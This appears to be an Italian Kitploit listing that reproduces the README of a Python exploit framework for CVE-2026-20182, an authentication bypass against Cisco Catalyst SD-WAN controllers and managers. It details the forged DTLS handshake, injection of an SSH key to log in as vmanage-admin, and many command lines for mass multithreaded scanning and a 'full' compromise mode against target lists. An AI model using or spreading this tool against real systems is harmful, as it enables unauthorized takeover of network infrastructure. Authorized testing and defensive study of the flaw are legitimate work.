Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-20182 — Cisco Catalyst SD-WAN Bypass dell'autenticazione del peering | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2026-20182
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSicurezza di RetePenetration TestingRed Teaming
GitHubnxploited/cve-2026-20182

CVE-2026-20182

Cisco Catalyst SD-WAN Bypass dell'autenticazione del peering

Vedi Repository
1284 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-20182

Cisco Catalyst SD-WAN Peering Authentication Bypass

CVE-2026-20182 — Cisco Catalyst SD-WAN Peering Authentication Bypass

Strumento di valutazione per test autorizzati del bypass dell'autenticazione di peering di Cisco Catalyst SD-WAN Controller / Manager (CVE-2026-20182).

CVECVE-2026-20182
GravitàCritica (CVSS 10.0)
CVSS 3.1AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
ProdottoCisco Catalyst SD-WAN Controller (formerly vSmart) · Cisco Catalyst SD-WAN Manager (formerly vManage)
ProblemaMeccanismo di autenticazione di peering non applicato correttamente
ScriptCVE-2026-20182.py

Riepilogo della vulnerabilità

Avviso di maggio 2026: Una falla nell'handshake della connessione di controllo / autenticazione di peering consente a un attaccante remoto non autenticato di bypassare l'autenticazione e ottenere accesso interno ad alti privilegi sui sistemi interessati.

Un attaccante invia richieste appositamente predisposte al sistema interessato. In caso di successo, l'attaccante può autenticarsi come account interno, ad alti privilegi, non-root e raggiungere NETCONF, consentendo la manipolazione della configurazione del fabric SD-WAN.

ElementoDettaglio
Vettore di attaccoRete
Privilegi richiestiNessuno
Interazione con l'utenteNessuna
AmbitoModificato
ImpattoRiservatezza, integrità e disponibilità — Alta

Raccomandazione: Applicare le correzioni di sicurezza Cisco secondo le indicazioni ufficiali del fornitore. Limitare l'esposizione del management plane, monitorare le connessioni del control plane e verificare i controller SD-WAN per modifiche di configurazione non autorizzate.


Contatti

Telegram: @KNxploited


Anteprima della console

CVE-2026-20182 operations console


Strumento: CVE-2026-20182.py

Framework di exploit in Python 3 per CVE-2026-20182 contro Cisco SD-WAN vdaemon (UDP/DTLS 12346).

Cosa fa (passo per passo)

PassoFaseDescrizione
1Carica i targetAnalizza targets.txt, unisce i duplicati per (host, domain_id, site_id)
2Preflight OpenSSLCarica le librerie condivise OpenSSL 3.x/4.x per DTLS personalizzato
3Connessione DTLSSi connette alla porta UDP del target (sempre 12346 per prima, poi le porte opzionali dell'elenco)
4CHALLENGERiceve CHALLENGE (0x08) dal server
5CHALLENGE_ACKInvia CHALLENGE_ACK appositamente predisposto come vHub (tipo 2) — bypass dell'autenticazione
6HelloCompleta lo scambio Hello — conferma il percorso di bypass
7aModalità CHECKFermati qui — registra solo bypass / Hello OK (niente chiavi, niente SSH)
7bModalità FULLInietta la chiave pubblica SSH tramite VMANAGE_TO_PEER
8Inject ACKAttende REGISTER_TO_VMANAGE (0x0D) come conferma del protocollo
9Verifica SSHVerifica il login come vmanage-admin su TCP 830 (NETCONF), opzionalmente 22
10OutputOrdina i risultati in file a livelli + elenco di comandi leggibile

Fallback di fabric: In caso di TEAR_DOWN o disallineamento dei parametri, riprova con preset domain/site alternativi (1,100), (1,1), (0,0) a meno che non venga specificato --no-fallback.


Livelli dei risultati (leggere attentamente)

LivelloFileSignificato
01 — SSH confermatocisco_sdwan_01_confirmed_ssh.jsonlssh_verified=true — unico livello considerato prova completa di compromissione
02 — Solo Inject ACKcisco_sdwan_02_inject_ack_only.jsonlIl protocollo ha accettato l'iniezione della chiave; login SSH fallito
03 — Solo bypasscisco_sdwan_03_bypass_only.jsonlHello/bypass OK; nessuna iniezione confermata

Importante

  • Modalità check → al massimo livello 03 (sonda di bypass). Non è prova completa di sfruttamento.
  • Modalità full → punta al livello 01 (ssh_verified).
  • https://host nell'elenco → solo indicazione web TCP (80/443). Non DTLS UDP su 443.

Requisiti

RequisitoNote
Python3.9+
pipcryptography, rich
OpenSSLlibrerie condivise 3.x o 4.x (libssl + libcrypto) — obbligatorie
pip install -r requirements.txt

OpenSSL (sistema)

Windows

  1. Installare Win64 OpenSSL 3.x o equivalente
  2. Aggiungere bin\ al PATH, oppure impostare:
OPENSSL_HOME=C:\Program Files\OpenSSL-Win64

Linux

# Debian/Ubuntu
sudo apt install libssl3 openssl
export LD_LIBRARY_PATH=/usr/lib/x86_64-linux-gnu:$LD_LIBRARY_PATH

Lo strumento termina all'avvio se OpenSSL non può essere caricato.


Avvio rapido

Menu interattivo (predefinito)

python CVE-2026-20182.py
  • Configurare le opzioni 1–11, poi 0 = AVVIA SCANSIONE
  • Modalità di esecuzione predefinita: check (sonda di bypass sicura)

Non interattivo (automazione)

python CVE-2026-20182.py -y

Modalità di esecuzione

ModalitàFlagIniezione SSHVerifica SSHQuando usarla
CHECK--mode check (predefinita)NoNoScreening di massa, rilevamento bypass
FULL--mode fullSìSì (tranne con --no-ssh-verify)Prova di compromissione

CHECK — solo sonda di bypass

python CVE-2026-20182.py -y --mode check

FULL — inietta chiave + verifica SSH (solo target autorizzati)

python CVE-2026-20182.py -y --mode full

Riferimento CLI (ogni flag + esempio)

Target e worker

-f / --file — elenco dei target (predefinito: targets.txt)

python CVE-2026-20182.py -y -f my_controllers.txt --mode check

-t / --threads — thread worker (1–200, predefinito 12)

python CVE-2026-20182.py -y -f targets.txt -t 30 --mode check

--domain — DOMAIN_ID predefinito quando non presente nell'elenco (predefinito: 1)

python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 100 --mode check

--site — SITE_ID predefinito quando non presente nell'elenco (predefinito: 100)

python CVE-2026-20182.py -y -f targets.txt --domain 1 --site 50 --mode full

Modalità e automazione

--mode — check | full

python CVE-2026-20182.py -y --mode full -f targets.txt

-y / --yes — salta il menu interattivo; usa solo i valori CLI

python CVE-2026-20182.py -y -f targets.txt --mode check -t 20

Verifica SSH

--no-ssh-verify — salta il test SSH post-iniezione (sconsigliato in modalità full)

python CVE-2026-20182.py -y --mode full --no-ssh-verify -f targets.txt

--verify-ssh22 — prova anche la TCP 22 dopo la 830

python CVE-2026-20182.py -y --mode full --verify-ssh22 -f targets.txt

UDP / fabric

--no-try-list-udp — solo UDP 12346; ignora :port dall'elenco

python CVE-2026-20182.py -y --no-try-list-udp -f targets.txt --mode check

--extra-udp-ports — lab: porte UDP extra su ogni host

python CVE-2026-20182.py -y --extra-udp-ports 8080,8443 -f targets.txt --mode check

--no-fallback — disabilita il nuovo tentativo domain/site su TEAR_DOWN

python CVE-2026-20182.py -y --no-fallback -f targets.txt --mode full

Scarica lo strumento